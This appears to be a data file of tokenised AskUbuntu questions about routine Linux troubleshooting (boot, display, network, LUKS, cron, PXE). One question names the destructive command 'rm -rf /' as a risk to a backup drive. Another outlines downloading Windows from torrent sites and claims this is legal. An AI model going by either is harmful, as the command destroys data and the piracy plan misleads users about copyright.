487046	what does the `` launch application '' window do when downloading software ?	i 'm running lubuntu , and i want to download and install a free password generator called pwgen from the ubuntu software centre . however , when i click the download button on the following page : https : //apps.ubuntu.com/cat/applications/saucy/pwgen/ , a launch application dialog box opens in which i am prompted to choose the name of an application . what application is it referring to , why is this application needed , and where can i find it ? in contrast , when i download software from the lubuntu software center , there 's no application required . the software downloads and installs transparently . ============== reply to user297048 i found `` apturl '' but did not have to download it because it was already downloaded . however , i could not find `` apt '' in the list of applications . so , i could not go any further .
487047	ubuntu 14.04 is n't show remote mount path	hi i 'm working on setup ubuntu 14.04 desktop for my client . i edited /etc/fstab file to mount 2 different servers . when i rebooted it 's mounted but not showing mountpath when i run df -h is there anyone know how to handle this case ?
487049	lightdm issue after installing xmonad , ubuntu 14.04	yesterday i decided to install and try xmonad on my laptop running a fairly fresh install of 14.04 . after running an xmonad session i decided to try the gnome-xmonad ( or something similar ) option . all i saw was the background , and none of the key combinations for xmonad worked , so i restarted using the power button . after that , the computer would n't boot into the lightdm login , only a grey screen . i can ctrl+alt+f1 to open a shell . sudo service lightdm restart did not work and start only told me lightdm was already running . i read this , but it does n't really apply to my issues . i tried adding sleep 2 according to this , but to no avail . i 'm not really sure what i 'm looking for right now , and decided to post this question before doing anything else . i 'll be available during the day to post logs and answer details . edit 1 : output of sudo lshw -c display : *-display description : vga compatible controller product : haswell-ult integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:66 memory : b5000000-b53fffff memory : c0000000-cfffffff ioport:6000 ( size=64 ) *-display description : 3d controller product : gk208m [ geforce gt 730m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:09:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=nouveau latency=0 resources : irq:65 memory : b3000000-b3ffffff memory : a0000000-afffffff memory : b0000000-b1ffffff ioport:3000 ( size=128 ) edit 2 : running sudo xorg -configure results in : fatal server error : ( ee ) server is already running for display 0 if this server is no longer running , remove /tmp/.x0-lock and start again .
487050	ubuntu virtualbox display problem	i just installed ubuntu 14.04 on virtualbox 4.1.14.i also installed the vb guest additions . the virtualbox is installed on a server machine . the screen resolution shows 640x480 which is the maximum the server allows , the desktop resolution shows 2560x1600 . i ca n't get it to show fullscreen , i can only see the top left of the screen.the host +f method does n't work . this is the first time i installed or used a linux system so please keep that in mind.we use windows for servers and employees.this installation is for test . how do i get it to show fullscreen ?
487051	password to unlock luks volume requested multiple times even after correct password is given	please help ! there is win7 on separate logical volume . then installed ubuntu on a encrypted lvm ( it is contains of two encrypted pv 's ) . everything 's fine , but luks password asked for 5-8 times when booting . and if i enter password all times , it wont boot in a desktop , but if i just hit `` enter '' with blank password - its ok , i can see a desktop . found a topic of another distro - mageia . there 's solution and patch for this bug , but i cant apply this for ubuntu , not enough skills . there 's some files of my config : etc/default/grub : grub_default=0 # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash cryptopts=target=sda3_crypt , source=/dev/sda3 , key=none , lvm=vvg-root , lvm=vvg-home '' grub_cmdline_linux= '' '' /etc/crypttab : # < target name > < source device > < key file > < options > luks-10451fb7-332d-484a-8089-e02726913b36 /dev/disk/by-uuid/10451fb7-332d-484a-8089-e02726913b36 none luks luks-96cc436a-cb46-4a7f-9474-518f5be9ff9a /dev/disk/by-uuid/96cc436a-cb46-4a7f-9474-518f5be9ff9a none luks , discard /etc/initramfs-tools/conf.d/cryptroot : target=sda3_crypt , source=/dev/disk/by-uuid/10451fb7-332d-484a-8089-e02726913b36 , key=none , lvm=vvg-root target=sda3_crypt , source=/dev/disk/by-uuid/10451fb7-332d-484a-8089-e02726913b36 , key=none , lvm=vvg-home target=sda3_crypt , source=/dev/disk/by-uuid/10451fb7-332d-484a-8089-e02726913b36 , key=none , lvm=vvg-swap root @ ubuntu : / # update-grub generating grub configuration file ... found image linux : /boot/vmlinuz-3.13.0-29-generic found image initrd : /boot/initrd.img-3.13.0-29-generic found image linux : /boot/vmlinuz-3.13.0-24-generic found image initrd : /boot/initrd.img-3.13.0-24-generic found memtest86+ image : /memtest86+.elf found memtest86+ image : /memtest86+.bin found windows 7 ( loader ) на /dev/sda2 finished
487054	xubuntu 14.04 dual display hot plugging - large windows disappear	i have a laptop that is docked and a external display plugged in . when i undock my laptop some windows ( xfterminal being the main one ) that are not maximised and too tall for my laptop display can not be displayed . they show in the panel and can be selected , but no window displays - i have to close and reopen the applications to see them on my laptop . not sure if this is a bug , but wondering if there is a way to get the windows to resize , like they do under unity/gnome/kde ?
487055	ca n't get osd lyrics ubuntu 14.04	i tried to add ppa on my 14.04 , but i got this error fetched 609 kb in 3min 44s ( 2,711 b/s ) w : failed to fetch http : //ppa.launchpad.net/osd-lyrics/ppa/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/osd-lyrics/ppa/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i already try screenlets sth : like that but it doees n't work either ... please help me ! guys !
487060	how to remove the other kernel installed in my ubuntu ?	i have compiled and installed linux kernel on to my ubuntu 13.10 . now i want to delete these installed kernel . but in synaptic and in cmd `` dpkg -l | grep linux-image '' it does n't show those compiled and installed kernel . but in `` update-grup '' it shows /boot/vmlinuz-x.x.x and /boot/initrd.img ... please help me to delete those kernels ... .
487065	just upgraded to the latest kernel version and the desktop stops responding	i have just completed my system update ( it downloaded about 300 mb ) , after a restart the desktop stopped responding , there is no wallpaper on the desktop , right click does not work ( it is happening only on the desktop , everywhere else it 's just fine ) . what i think is i have just now upgraded to the latest kernel version ( 3.13.0-24-generic ) so maybe the new kernel is causing the problems.i use an nvidia graphic card with drivers , the output of the command glxinfo | grep opengl gave the following output opengl vendor string : nvidia corporation opengl renderer string : geforce 310m/pcie/sse2 opengl core profile version string : 3.3.0 nvidia 304.117 opengl core profile shading language version string : 3.30 nvidia via cg compiler opengl core profile context flags : ( none ) opengl core profile profile mask : core profile opengl core profile extensions : opengl version string : 3.3.0 nvidia 304.117 opengl shading language version string : 3.30 nvidia via cg compiler opengl context flags : ( none ) opengl profile mask : ( none ) opengl extensions : i hope its not the graphic card problem because i am using kde now on my laptop without any issues , so only unity is affected . thanks in advance ! !
487067	difference between +x and ./ < script > and sh ./ < script >	are there any actual differences between running a script with [ sudo ] sh ./ < script > .run instead of [ sudo ] chmod +x ./ < script > .run [ sudo ] ./ < script > .run
487068	network fails when hd moved	my hd was moved into new reassembled pc . everything works , except networking ( wired/wireless ) . linux can see the devices , but can not activate . following are data that i can get : # uname -a linux fxt-acasp-l3600 3.2.0-39-generic # 62-ubuntu smp wed feb 27 22:05:17 utc 2013 i686 i686 i386 gnu/linux # nm-tool ** ( process:3207 ) : warning ** : could not initialize nmclient /org/freedesktop/networkmanager : the name org.freedesktop.networkmanager was not provided by any .service files networkmanager tool state : unknown # lshw -c network *-network disabled description : ethernet interface product : ar8151 v2.0 gigabit ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth1 version : c0 serial : 94 : de:80:96:36:32 capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi firmware=n/a latency=0 link=no multicast=yes port=twisted pair resources : irq:17 memory : fdec0000-fdefffff ioport : df00 ( size=128 ) *-network unclaimed description : network controller product : ralink corp. vendor : ralink corp. physical id : 0 bus info : pci @ 0000:03:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=32 maxlatency=4 mingnt=2 resources : memory : fddf0000-fddfffff invoke-rc.d networking restart * running /etc/init.d/networking restart is deprecated because it may not enable again some interfaces * reconfiguring network interfaces ... # dhclient eth1 rtnetlink answers : operation not permitted # cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten # ping 192.168.1.1 connect : network is unreachable # ifconfig -a eth1 link encap : ethernet hwaddr 94 : de:80:96:36:32 broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:4388 errors:0 dropped:0 overruns:0 frame:0 tx packets:4388 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:320020 ( 320.0 kb ) tx bytes:320020 ( 320.0 kb ) how should i activate the network card ( it 's onboard ) and the wifi . please give me a hint .
487071	opera 24 developer for linux will not launch	today i downloaded the much anticipated , for me at least , opera 24 for linux . very unfortunately i get an error and can not launch opera unless i do it as root . the following is returned unless i run as root : opera-developer [ 0623/111432 : error : chrome_import_controller.cc ( 122 ) ] could not create a copy of bookmarks , will not import . segmentation fault ( core dumped ) [ 0100/000000 : fatal : zygote_linux.cc ( 368 ) ] failed to synchronise with parent zygote process [ 0623/111432 : error : chrome_import_controller.cc ( 122 ) ] could not create a copy of bookmarks , will not import . [ 0623/111432 : error : chrome_import_controller.cc ( 122 ) ] could not create a copy of bookmarks , will not import . [ 0100/000000 : fatal : zygote_linux.cc ( 368 ) ] failed to synchronise with parent zygote process when successfully executed nothing more then a ibus-warning is returned stating that /home/viktor/.config/ibus/bus is n't owned by root . i run opera 24.0.1537.0 developer on ubuntu 14.04 64-bit . opera on the other hand can not recognize some part of my system ; system : ubuntu 14.04 lts ( x86_64 ; unknown ) . i understand of course that this is a development release of opera and i should n't expect it to work on all machines and it should n't work perfectly . although i still find that , since the software itself work flawlessly , you should be able to remove the need for root privileges . -- edit -- i forgot to mention it here on askubuntu but i got in touch with a developer who promised everything would be alright in the next update . i can now launch opera without trouble but no settings/addons will be launched , even though they are stored . launching with root will load all addons and all settings will be loaded ( that 's how i know they were saved ) . i figured this question is now outdated and no longer relevant and i 'm planning to make another one shortly . if you think you know the answer to my new problems you are ofc welcome to post an answer .
487072	cron does n't run the job	i am trying to add a job to cron using sudo crontab -e using * * * * * root /usr/bin/getmail does n't work . ubuntu version is trusty i get confirmation crontab : installing new crontab . i am checking using sudo pgrep getmail to see if it starts the process , but nothing the path /usr/bin/getmail is verified . i can run it . i am leaving a newline at the end of crontab . i am running it every minute , only to see if it works . once it does , it will be run every 4 hours . what could i be doing wrong ?
487080	sogo connector addon not working	i just downloaded the sogo connector from http : //www.sogo.nu/downloads/frontends.html to sync owncloud contacts with thunderbird 24.6.0 . according to the documentation this should enable the option `` remote adressbook '' in the `` new '' menu . but this was n't the case for me . what am i doing wrong ? thanks in advance , markus
487081	using awk to print variable in loop	i am beginner in working with bash script . i have a data file : i z r 0 -30 3.5 0 -29.5 3.4 0 -29 3.6 ... 0 29.5 4.2 0 30 4.6 1 -30 2.8 1 -29.5 3.4 ... . 1 30 5.2 2 -30 2.5 2 -29.5 2.6 and i 'm trying to rearrange data into a file like this : i z r 0 -30 3.5 1 -30 2.8 2 -30 2.5 ... 0 -29.5 3.4 1 -29.5 3.4 2 -29.5 2.6 ... i used the script below but it cant not run like what i desire . awk ' { for ( z=/-30/ ; z < =30 ; z+=0.5 ) { for ( i=0 ; i < =17489 ; i++ ) { if ( $ 1== $ i & & $ 2== $ z ) print $ 1 $ 2 $ 3 } } } ' data.dat > > avg_sd.dat please help me ! thank you so much .
487082	compiling c code for arm processor on ubuntu 12.04	i am compiling my simple `` hello world '' c code using the following command : arm-linux-gnueabi-gcc-4.4 test.cpp -o test it generates an error : arm-linux-gnueabi-gcc-4.4 : error trying to exec 'cc1plus ' : execvp : no such file or directory my directory : `` usr/lib/gcc/arm-linux-gnueabi/4.4.7 '' wo n't have any `` cc1plus '' file as the compiler is looking for 'cc1plus ' whereas my `` usr/lib/gcc/arm-linux-gnueabi/4.6 '' has the 'cc1plus ' file . my test.cpp is a simple `` hello-world '' program , which i am going to target for arm processor . please suggest how to solve this problem .
487083	is removing ibus enough ?	i am using kubuntu 14.04 . i had to completely remove ibus because not only it bugged chromium , but also i do not need it at all . unfortunately , i have the feeling it is not completely disabled because i have warning messages in some application logs : x @ aspire6930g : ~ $ konsole qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . x @ aspire6930g : ~ $ bus : :open : connect ibus failed ! ibusinputcontext : :createinputcontext : no connection to ibus-daemon as the ibus package no longer exists on my system , there is no ibus-daemon . my question is : what additional step should i perform to tell the system that i do not use ibus ?
487084	forward root mail to external email address	i have a headless ubuntu 14.04 machine which i 'd like to configure to forward root mails to an external email address ( gmail in this instance , not sure if that makes a difference ) . this is so that if any issues crop up i can be notified via email , rather than have them sit in a local root mail folder which never gets looked at . i have tried several guides online , but just get emails sent to root @ localhost , which end up in gmail 's spam folder . furthermore , i 'd really like for it to be a non-interactive configuration if possible , since i 'm going to put this into ansible configuration scripts .
487091	how do i get fable : the lost chapters working with playonlinux	i have the steam version of fable : the lost chapters and i tried opening it with playonlinux with the default setup but steam crashed on start up . i fixed steam by using the latest version of wine and installed the game but when i run it it just does this : i have tried folowing the advice on winehq and deleated the intro videos but this had no effect . is there something else i need to do to get this working ?
487093	disable hud menu	i know it may be useful feature for someone , but i do n't use it at all . is there any way to protect hud key from beeing set up after every/some update of ubuntu ?
487094	how to fix `cat : write error : broken pipe` ?	i 'm following realtime adaptive translation systems with cdec , tutorial by michael denkowski . in parameter tuning step , after creating the cdec.ini and weights.init files , i tried to run this command : ~/prefix/sw/cdec/training/mira/mira.py -d dev.es-en -c cdec.ini -w weights.init -j 2 -o mira-work -- max-iterations 20 -- optimizer 2 -- metric-scale 1 -k 500 -- update-size 500 -- step-size 0.01 -- hope 1 -- fear 1 -g dev.es.g-o/grammar but it throws the following error : error : root : failed with exit code 1 cat : write error : broken pipe could any body please help me to solve this problem ?
487096	auto start firefox and launch a url by default in lubuntu 14.04	i want to autolaunch firefox and load some default url when my system is logged in or rebooted . the option should be in lubuntu 14.04 .
487097	ubuntu 14.04 does not allow changing default calculator ?	i created a custom shortcut in keyboard- > shortcuts and set it opens qalculator app . then i assigned to it the keyboard calculator key . ubuntu asked me if i want to replace the original app and i confirmed it . but now , nothing happens when i press the keyboard calculator key ! i even changed the command from qalculator to /usr/bin/qalculate or /usr/share/qalculate , but the app does not open at all .
487103	does anyone thyed macbuntu pack ?	i have tryed it and got problems with my laptop ( my cpu is heavily loading ) . wheter could it could happen because of this package ? i 've been followed by this instructions : http : //www.noobslab.com/2014/04/macbuntu-1404-pack-is-released.html
487104	steam crashes after initial update	so i have been wrestling with getting steam installed on my computer for quite some time now , and i had given up all hope . well today i finally did the smart thing and installed pol to manage my different wine distros , and i figured i could get it up and running-and during the steam summer sale to boot ! well , alas my core problem still exists . during the initial update that happens right after you install the msi file , steam tells me that i need to be connected to the internet in order to update , yaddayaddayadda , then it crashes . same error as before . when opening up the debugger , i found the following error pop up over and over again , followed by various filesize mismatch errors : '' fixme : winhttp : get_system_proxy_autoconfig_url no support on this platform '' '' [ 2013-06-23 12:29:15 ] package file tenfoot_abientsounds_all.zip.888yaddayadda missing or incorrect file size '' i have searched all over the forums for how to fix this , and i just ca n't seem to find a solution anywhere . any ideas ?
487105	what are the ip addresses in my iptables chain forward settings in a dokku/docker setup ?	i 've been playing around with dokku on digitalocean ( following this guide ) and i 'm trying to understand current firewall settings . so here 's my setup : ubuntu 14.04 dokku docker ( as part of dokku ) postgresql within my dokku container ( using dokku-postgresql-plugin ) fail2ban ( i installed this myself , was n't part of the dokku template ) what i ca n't wrap my mind around are the chain forward settings - specifically the ip addresses next to tcp dpt:5000 and tcp dpt : postgresql . me : ~ $ sudo iptables -l chain input ( policy accept ) target prot opt source destination fail2ban-ssh tcp -- anywhere anywhere multiport dports ssh chain forward ( policy accept ) target prot opt source destination accept tcp -- anywhere xxx.17.0.50 tcp dpt:5000 accept tcp -- anywhere xxx.17.0.2 tcp dpt : postgresql accept all -- anywhere anywhere ctstate related , established accept all -- anywhere anywhere accept all -- anywhere anywhere chain output ( policy accept ) target prot opt source destination chain fail2ban-ssh ( 1 references ) target prot opt source destination return all -- anywhere anywhere me : ~ $ i 'd guess that the xxx.17.0.y ip addresses are originating within my docker container - is that a fair guess ? assuming that 's the case , they probably are not accessible to the outside world , correct ? what i 'm trying to ultimately do is get reasonable secure firewall settings in place ; e.g. , lock down all input except for ssh , http & https . i just want to make sure i understand the existing settings before i continue .
487106	multiple keyboards multiple languages ?	on my laptop running ubuntu 14.04 , i have a swedish layout keyboard . now that i 'm working i have a uk layout usb keyboard . is there a way to have them both run different layouts , because at the moment my uk keyboard is using swedish layout . i do not want to change keyboard settings every time i switch .
487108	external hard drive file with password on ubuntu	i 'm beginner in linux and ubuntu ( 12.04 ) . for this time i can execute simple orders . now i got some outstanding ( for my current level ) problem . i have external hard disk with some file and also one password for this file . in ubuntu directory i have found my hard disk , but could n't see any files ( with other words the content of hd is empty ) ... i need to use my password for this . what i need to do for a take a look in the file ? ... or with other words : how i can open it with linux order ( with the usage of my password ) ? thank you for every post ! ps my os is ubuntu 12.04 , i ca n't encrypt my file ( s ) , because i ca n't see this files on my hd . this is also the main problem . at first i use property and can see that i have someting on my disk ( is not empty ) . consequently , i found the root - /media/ '' hd name '' . after the first searching for solution , i install storage device manager . this program get me sda and sdb path back . with the option dynamic and configuration rules i can see my external hd under the name sda1 . if i should download some program for encrypt my hd , please tell me this . pps ok , i find with other machine that the problem is not in linux order ... we found already complet other solution .
487109	problems recovering ubuntu or reinstalling ubuntu alongside win8	i am trying to get linux back running on my laptop that has win8 . it used to run before i upgraded to win8.1 but now , whenever i choose linux in the boot menu it just returns some messages saying that it failed to mount . the errors are the following : ( sorry for the crappy pic ) i then tried to boot ubuntu from a usb drive to recover it . however , ubuntu never loads and either : freezes in a blank screen with a blinking _ or loads win8 instead if i boot from a ubuntu dvd . ( i took care to see the boot priorities in bios ) so my questions are the following : do you have any idea of what might have broken ubuntu in the first place ? i did n't remember messing around with it . would the upgrade to win8.1 really break it ? is there any way to recover it , without breaking win8 and without having to reinstall it ? or would you just advise me to reinstall it fresh ? update i was able to run the liveusb by having uefi enabled . running boot-repair from a liveusb now rendered the laptop unusable since none of the os work . the log from the boot-repair is in here : http : //paste.ubuntu.com/7691026/ ran boot-repair again , still to no avail : http : //paste.ubuntu.com/7691350/ note that boot-repair is selecting /sdb in restore the mbr of : sdb ( generic mbr ) . i have no other option to choose in here besides others for sdb , although linux is installed in sda3 , sda5 and sda6 as you can see from this screen i can , however , enter grub . i have gnu grub version 2.00-13ubuntu3 minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . i appreciate all the help
487110	how to open application instead of context menu in gnome notification area ?	i have an ubuntu 14.04 and gnome ( gnome-session 3.9.90 ) . when i clicking on icon in the notification area , i see a context menu , not the window of application ( early my skype and dropbox opens a window , not the menu ) . how can i fix it ( open app window , not menu ) ?
487111	use ubuntu server as proxy	first of all if i 'm asking this question at wrong place i 'm terribly sorry for it . i 'm an expert about nt servers but very rookie about linux systems , i 'm making tests to learn it . i want to share internet connection via ubuntu server but i do n't want to enter proxy address from ie or chrome to user 's computers manually . maybe some of you know devices like sonicwall etc . those devices provides ip address , gateway and dns to computers so you do n't need to enter manually . i found many articles about squid & dhcp installation and configuration but almost in every article people says you need to enter proxy settings manually . i was wondering can you guys offer me an article or document how i can do that . as i said before i google it so many articles and they give you the commands and parameters but almost none of it explaining why we using that command , i mean what does it means or what does it do . if somebody can share an article or document or link for a rookie as me it will be great . thanks for understanding and thanks in advance .
487114	internet is n't working in ubuntu 14.04 as virtualbox guest os	i have installed ubuntu 14.04 trusty tahr as guest os in vitual box on windows 8 . but the internet is n't working in my guest os . where is the problem ?
487117	how to run local shell script over ssh with su option	i have a script called test_ms.sh which i want to run over ssh along with the su - username option . i am user x on server a and server b and i have su access to user y on server b. i do not have direct access to user y . now , i want to execute the script located on server a as user y on the remote server b . if i run the script via ssh as user x s it works fine ssh x @ b 'sh -s ' < test_ms.sh however , if i run the script as user b on server y from server a through user x , it does n't work . i am using following approach to execute the script . ssh x @ b su y -c 'sh -s ' < test_ms.sh please suggest how to accomplish this .
487118	why does winetricks shows when filtering synaptic with `` vlc '' ?	trying to hunt a segmentation error that prevents me from launching vlc 2.1.4 in trusty , i completly removed both vlc and winetricks and all their dependencies ( a single p7zip for winetricks ) . when filtering synaptic quick search for vlc , winetricks is still shown in packages results pane , although i ca n't see any direct dependency from one to the other . other guy told me he does n't see this . how do i understand ?
487121	ubuntu sdk : template html5 app shows warning	i have created a new html5 app with the ubuntu sdk , and whenever i click the run button , i get the following output on the console : setting import path to : /home/dbugger/bautista/www/../lib/x86_64-linux-gnu warning : this project is using the experimental qml api extensions for qtwebkit and is therefore tied to a specific qtwebkit release . warning : the experimental api will change from version to version , or even be removed . you have been warned ! unity : :action : :actionmanager : :actionmanager ( qobject* ) : could not determine application identifier . hud will not work properly . provide your application identifier in $ app_id environment variable . can not create cordovaview object . falling back on the plain webview backend . inspector server started successfully . try pointing a webkit browser to http : //192.168.178.25:9221 ** ( ubuntu-html5-app-launcher:16912 ) : warning ** : unable to register app : gdbus.error : org.freedesktop.dbus.error.invalidargs : invalid application id injecting webapps script [ 0 ] : file : ///usr/lib/x86_64-linux-gnu/qt5/qml/ubuntu/unitywebapps/unity-webapps-api.js i get the warnings about using an experimental api , but the next messages are quite puzzling . i do not really understand what they are trying to say , but it kinda looks as if i was missing something . can someone explain me what they are about , and if i should do something to get rid of them ?
487124	tftp client can not find pxe boot configuration file	i have set up dhcp and tftp servers to allow boot via network . my server is 192.168.10.50 and the client is 192.168.10.51 the client gives me this : searching for server ( dhcp ) ... me : 192.168.10.51 , dhcp : 192.168.10.50 , tftp : 192.168.10.50 , gateway : 192.168.10.50 loading 192.168.10.50 : pxelinux.0 ... ( done ) ... tftp prefix : unable to locate configuration file boot failed on the server side , the syslog says : testserver dhcpd : dhcpack on 192.168.10.51 to 52:54:00:28:90 : f6 via eth1 testserver tftpd : trying to get file : pxelinux.0 testserver tftpd : serving file from /var/lib/tftpboot testserver tftpd : trying to get file : pxelinux.cfg/default testserver tftpd : serving file from /var/lib/tftpboot if i do ls -l on /var/lib/tftpboot/pxelinux.cfg , i get : -rwxrwxrwx 1 root root 0 jun 23 11:59 default i.e. , the file exists and is readable . can anyone tell me why the tftp client fails to boot ?
487131	installation failed whilst installing ubuntu 13.10	i have fitted a new from box hard drive into my pc instead of the original 80gb . my pc has 2gb memory installed . i tried installing ubuntu version 14.04 but failed so i thought it was too advanced for my system . i have now tried to install version 13.10 and i am having the same problem , after going some way of installing to the page where i enter my details and error message popus up saying that the installation has failed ( errno 5 ) regarding bad disks etc . if i opt to try ubuntu from disk all works fine , i click on icon to install and it goes as far as the screen when i opt to install . what can be the problem ? i was running version 12.04 on the old hard drive and all of a sudden the screen went all fuzzy with all the colours spread out . i was not able to boot the pc after so i decided that the hard drive had gone because it could not function . i used puppy linux disk to gather the information off the disk and tried to install 14.04 onto it , but that was failing also . it does not look like a hardware problem as all seems to be fine . i have checked the contents of the hard drive and all the files look as if they have installed correctly . i have changed the bios setting and only get flashing cursor when booting from hard drive .
487133	how to save the contents of unlogged console screen to a file ?	i 'm on a tty , with a lots of command inputs , bulk of verbose their output , and some error messages . now i have to get all those stdin/stdout/stderr texts , in the format displayed in the console screen , dumped to a file . how can i get that done using the inbuilt tools ( preferably ) ? i do n't know if the question is confusing ! it 's really a simple one.. suppose i logged into tty1 console terminal , ran some commands ( with no logging enabled , because i did n't feel the need to ) but suddenly there came certain outputs/messages that i want to dump into a file ( or the other option get a pen and a paper ) . the reason why i am assuming this could be done is because you can use the shift + pgup/pgdwn to shift the screen outputs , which means they are still there in the buffer ( even if the processing is pipelined ) ! ..and that is what should be recovered .
487134	envelopes print backwards	i 've used 4 different printers on linux over the years and all print the envelopes flipped backwards . this sometimes causes the envelopes to jam because the rollers are n't in the proper location for the flaps . i was using osx at one time and believe it uses the same cups print system as linux . anyway , both osx and all windows versions print the envelopes properly on each of these same printers . this makes me think something is reversed in the cups system on linux . is it possible to get linux cups working properly when printing envelopes ?
487135	shutdown lubuntu	since installing ubuntu 12.04 and now lubuntu 14.04 i can not power off machine unless done manually . i have searched the forums and tried every `` sudo '' command mentioned , none of them work . shutdown begins and then hangs is splash screen and must be powered off with button . i did get a `` no kernel '' message once and never showed up again . again i have tried all the `` shudo shutdown/ sudo halt/ blah blah blah i found in the forums , nothing works . ideas ?
487136	how to install ubuntu 14.04 over windows.8.1	i have a new laptop ( asus f550la 15.6 '' ) intially with win 8 . when i had downloaded updates and had 8.1 . i used windows to shrink the c partition as much as i was allowed ( to 150 gb ) deleted `` data partition '' and installed ubuntu beside windows . all well , except that a ) i do n't like windows 8.1 and it is too large , ( b ) there are now an awfully large number of partitions on my hard disk : 8 , only 3 of which are for ubuntu . three `` partitions '' before c ( system , recovery and ? , and 1 ( recovery ) after the ubuntu partitions . that 's ridiculous ! ! so i want to erase everything , install ubuntu again on the entire disk . problem is , the option is no longer there . i get options : 1 ) update ubuntu 2 ) erase existing ubuntu and install again 3 ) other no option to install on entire disk . please tell me : if i erase all partitions in the `` other '' , and make only my three ubuntu partitions , will i have trouble with uefi ? ( confirm-securebootuefi - > true ) i have read for instance installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) which really only made me even more nervous . sorry this was long , but i ruined a laptop in 2011 because of the uefi/efi issue , which i still do n't understand , so i really want to be a little cautious .
487137	pc wo n't start . partition error	i installed ubuntu , but due to some unfortunate problems the installation got interupted , now my lap is not opening . it wont load windows and shows this message , error : no such partition grub rescue > i booted my whole system but still no use , showing the same message , what should i do to restore my pc ? please help me .
487138	easiest way to move from ubuntu to windows ?	for my study next year , my computer has to run windows . it 's a requirement . right now , i want to get used to it a little more , so i plan on installing windows preemptively . i 'm currently running ubuntu 14.04 , though originally my laptop came with windows 8 installed . i believe this means that my activation code or whatever is stored within the bios ( ? ) . i do not own a cd with windows 8 ( .1 ) on it . i have a 250gb external hard drive -- more than enough to store all my files . now , my question is , what is the easiest and safest way to switch to windows 8 ( .1 ) , while keeping all my files ? i 've tried dual-booting in the past , but it did n't work out for me . i thought of this plan : first i 'd copy my entire home folder to my external hard drive . meanwhile , i 'd search the piratebay or kickasstorrents for a copy of windows 8 ( .1 ) ( this is legal in my home country : i 'm allowed to download anything i 've technically paid for ) then i 'd burn that copy to a cd or dvd then boot up from the disk and tell it to erase all data and install windows lastly , i 'd reallocate all my files from my hard drive to my laptop is this a reasonable plan of action ? i 'm extremely afraid i forgot an essential step or am planning to do something that simply is not possible .
487139	how to prevent a partition from being mounted [ by dolphin ] ?	i have a partition taking a whole separate drive that i use for backups . i do n't want it to be automounted at startup or mounted by anything i 'm not aware of because else it would kill the purpose of being protected against ( amongst other things ) rm -rf / . here 's a piece of my fstab : # backups uuid= ... /mnt/backups ext4 nouser , noauto , ro , suid , dev , exec , async 0 2 this works with command line mount actions but as a normal user if i click on the drive in dolphin it still gets mounted although while respecting read only mode , which makes it less harmful . how can i totally prevent dolphin from doing its thing on its own with my partitions ? i 'm on a really fresh kubuntu 14.04 . note : i read this , but the asker said in a comment that he ran into the same issue .
487150	i 'm trying to create a makefile when i get the following errors	i 'm am trying to compile usb drivers . here is the result of my make file attempt : user @ ubuntu1310 : ~/downloads/linux_driver $ sudo make -o cp210x make -c /lib/modules/3.11.0-12-generic/build m= modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.11.0-12-generic' make [ 2 ] : *** no rule to make target `/usr/src/linux-headers-3.11.0-12-generic/arch/x86/syscalls/syscall_32.tbl ' , needed by `arch/x86/syscalls/../include/generated/uapi/asm/unistd_32.h ' . stop . make [ 1 ] : *** [ archheaders ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.11.0-12-generic' make : *** [ all ] error 2 the makefile contents are : obj-m = cp210x.o kversion = $ ( shell uname -r ) all : make -c /lib/modules/ $ ( kversion ) /build m= $ ( pwd ) modules clean : make -c /lib/modules/ $ ( kversion ) /build m= $ ( pwd ) clean please help anyone who can . thank you .
487153	reboot / shutdown log	on a 12.04 server , i have random reboot issues with my dedicated server , that i can only resolve through ssh . sometimes ( usually after applying important security updates ) , i issue a reboot through ssh . the server becomes inaccessible ( apache , ssh ) but still responds to ping . most services seem to have shut down , but there server did n't reboot . in those situations , i have to request a manual reboot through the web interface ( basically , they just cur the power ) . and sometimes , it is n't enough . the server restarts , but again , no http , no ssh . i have to do a second manual reboot . after that , i can issue many reboot through ssh , with no config change , and the server will work . until next time . i am under the impression that this `` reboot '' issue only appears when i have n't rebooted for some time ( several days/weeks ) . how can i investigate this issue ? i have tried looking at kernel.log the last failed ssh reboot was around 15:10 the manual reboot was at 15:32 . jun 22 16:20:52 server1 kernel : [ 579427.072541 ] udp : bad checksum . from 71.6.135.131:40000 to 37.187.100.21:161 ulen 51 jun 23 15:10:19 server1 kernel : kernel logging ( proc ) stopped . jun 23 15:32:05 server1 kernel : imklog 5.8.6 , log source = /proc/kmsg started . jun 23 15:32:05 server1 kernel : [ 0.000000 ] initializing cgroup subsys cpuset jun 